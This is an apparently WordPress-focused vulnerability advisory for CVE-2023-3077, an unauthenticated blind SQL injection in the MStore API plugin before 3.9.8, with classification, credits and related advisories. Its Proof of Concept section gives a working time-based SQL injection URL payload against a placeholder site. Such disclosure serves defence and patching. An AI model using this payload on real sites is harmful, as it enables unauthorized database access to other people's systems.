MStore API < 3.9.8 – Unauthenticated Blind SQLi

Description

The plugin does not sanitise and escape a parameter before using it in a SQL statement, leading to a Blind SQL injection exploitable by unauthenticated users. This is only exploitable if the site owner elected to pay to get access to the plugins' pro features, and uses the woocommerce-appointments plugin.

Proof of Concept

https://vulnerable-site.tld/wp-json/api/flutter_booking/get_staffs?product_id=%27+or+ID=sleep(10)--+-

Affects Plugins

mstore-api

Fixed in 3.9.8

References

CVE

CVE-2023-3077

Classification

Type

SQLI

OWASP top 10

A1: Injection

CWE

CWE-89

CVSS

8.6 (high)

Miscellaneous

Original Researcher

Truoc Phan

Submitter

Truoc Phan

Submitter website

https://www.facebook.com/292706121240740

Submitter twitter

truocphan

Verified

Yes

WPVDB ID

9480d0b5-97da-467d-98f6-71a32599a432

Timeline

Publicly Published

2023-06-19 (about 5 months ago)

Added

2023-06-19 (about 5 months ago)

Last Updated

2023-06-19 (about 5 months ago)

Other

Published

Title

Published

2022-12-05

Title

Contest Gallery < 19.1.5 - Author+ SQL Injection

Published

2023-07-12

Title

User Activity Log < 1.6.3 - Admin+ SQLi

Published

2021-08-22

Title

WordPress Page Contact <= 1.0 - Authenticated (editor+) SQL Injection

Published

2023-10-11

Title

ChatBot < 4.9.1 - Unauthenticated Blind SQL Injection

Published

2014-08-01

Title

Easy Contact Form Lite <= 1.0.7 - SQL Injection